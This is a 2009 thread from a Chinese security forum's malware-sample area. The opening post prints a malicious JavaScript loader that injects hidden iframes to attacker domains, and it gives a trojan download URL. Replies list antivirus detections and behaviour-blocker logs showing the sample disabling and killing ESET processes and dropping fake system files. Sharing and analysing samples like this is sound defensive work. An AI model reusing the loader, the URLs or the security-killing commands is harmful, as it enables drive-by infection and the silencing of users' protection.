收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 又来一个
12下一页
返回列表 发新帖
查看: 3502|回复: 18
收起左侧

[病毒样本] 又来一个

[复制链接]
dayang1717
发表于 2009-5-25 17:59:17 | 显示全部楼层 |阅读模式
<script language="javascript" src="http://playe.gaming.cx/asd.js?s=201&col=ffdd00"></script>

var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var sc=document.getElementsByTagName('script');
var paramsArr=sc[sc.length-1].src.split('//')[1].split('?');
var kesor = cookA.indexOf(cookName);
var Thenm =  Then.getSeconds();
if (kesor == -1)
   {
document.write('<iframe src=http://zwwderff.cn/09/0009.htm width=100 height=0></iframe>');
document.write('<iframe src=http://zwwderff.cn/09/0009.htm width=100 height=0></iframe>');
document.write('<iframe src=http://zwwderff.cn/09/0009.htm width=100 height=0></iframe>');
document.write('<iframe src=http://zwwderff.cn/09/0009.htm width=100 height=0></iframe>');
document.write('<iframe src=http://zwwderff.cn/09/0009.htm width=100 height=0></iframe>');
document.write('<iframe src=http://zwwderff.cn/09/0009.htm width=100 height=0></iframe>');
document.write('<iframe src=http://zwwderff.cn/09/0009.htm width=100 height=0></iframe>');
document.write('<iframe src=about:blank width=50 height=0 id=adfrmae border=0></iframe>');
setTimeout(ggto,1000);
setTimeout(ggto,2000);
setTimeout(ggto,3000);
setTimeout(ggto,4000);
setTimeout(ggto,5000);
//document.write('<iframe src=http://ddv.sarl.tk/cnzz1.html width=0 height=0></Iframe>');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count41.51yes.com/sa.aspx?id=419175949&amp;refe='+window.parent.location+'&amp;location=http%3A//'+paramsArr[0]+'&amp;color=32x&amp;resolution=1280x1024&amp;returning=0&amp;language=zh-cn&amp;ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
   }
function ggto(){
adfrmae.location.href='http://zwwderff.cn/09/0009.htm';
  }
function ckkk(digit){
   var sourceStr="0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z";    //这里还可以继续添加
   arrStr=sourceStr.split(",");
   var result="";
   var suf=0;
   for(i=0;i<parseInt(digit);i++){
      suf=parseInt(Math.random()*arrStr.length);
      result=result+arrStr[suf];
   }
   return result;
}

http://qscdfdda.cn/9.exe

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

hddu
发表于 2009-5-25 18:55:02 | 显示全部楼层


2009-05-25 18:59:58    运行应用程序      操作:阻止并结束进程
进程路径:F:\9\9.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c sc config ekrn start= disabled
触发规则:所有程序规则->系统程序_黑名单->*\cmd.exe

[ 本帖最后由 hddu 于 2009-5-25 18:56 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

黑衣~魂
发表于 2009-5-25 18:58:08 | 显示全部楼层
to dw
回复

举报

狂舞的猪
发表于 2009-5-25 19:21:00 | 显示全部楼层
江民杀
回复

举报

Love=卡巴+费尔
发表于 2009-5-25 20:28:02 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

kingsheet
发表于 2009-5-25 20:28:44 | 显示全部楼层
卡巴
检测到:木马程序 Trojan.Win32.Antavmu.nk        URL: http://bbs.kafan.cn/attachment.p ... t=1243254495//9.exe
回复

举报

BING126
头像被屏蔽
发表于 2009-5-25 20:37:43 | 显示全部楼层
McAfee        Generic.dx!db
回复

举报

左手
发表于 2009-5-25 23:59:51 | 显示全部楼层
2009-05-25 23:58:27    运行应用程序      操作:阻止
进程路径:E:\virus\9.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c sc config ekrn start= disabled
触发规则:应用程序规则->AD:04…禁止的程序操作->*.*->*\cmd.exe


2009-05-25 23:58:32    运行应用程序      操作:阻止
进程路径:E:\virus\9.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c taskkill.exe /im ekrn.exe /f
触发规则:应用程序规则->AD:04…禁止的程序操作->*.*->*\cmd.exe


2009-05-25 23:58:37    运行应用程序      操作:阻止
进程路径:E:\virus\9.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c taskkill.exe /im egui.exe /f
触发规则:应用程序规则->AD:04…禁止的程序操作->*.*->*\cmd.exe


2009-05-25 23:59:00    创建文件      操作:阻止
进程路径:E:\virus\9.exe
文件路径:C:\WINDOWS\12353015test.dll
触发规则:所有程序规则->FD:01…系统文件组->%SystemDrive%\*.dll


2009-05-25 23:59:01    运行应用程序      操作:阻止
进程路径:E:\virus\9.exe
文件路径:C:\WINDOWS\system32\rundll32.exe
命令行:C:\WINDOWS\12353015test.dll testall
触发规则:所有程序规则->AD:01…禁止注入系统进程(黑名单)->%windir%\System32\rundll32.exe


2009-05-25 23:59:04    创建文件      操作:阻止并结束进程
进程路径:E:\virus\重要文件..EXE
文件路径:C:\WINDOWS\system\smss.exe
触发规则:所有程序规则->FD:01…系统文件组->%SystemDrive%\*.exe


2009-05-25 23:59:04    创建文件      操作:阻止并结束进程
进程路径:E:\virus\重要文件..EXE
文件路径:C:\WINDOWS\system\smss.exe
触发规则:所有程序规则->FD:01…系统文件组->%SystemDrive%\*.exe


2009-05-25 23:59:20    创建文件      操作:阻止并结束进程
进程路径:E:\virus\9.exe
文件路径:C:\WINDOWS\extext12372718t.exe
触发规则:所有程序规则->FD:01…系统文件组->%SystemDrive%\*.exe
回复

举报

kingmuro
头像被屏蔽
发表于 2009-5-26 00:14:42 | 显示全部楼层

kis6.0

Trojan.Win32.Antavmu.nk
回复

举报

心动
发表于 2009-5-26 00:18:38 | 显示全部楼层
To Eset
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-13 00:45 , Processed in 0.130211 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表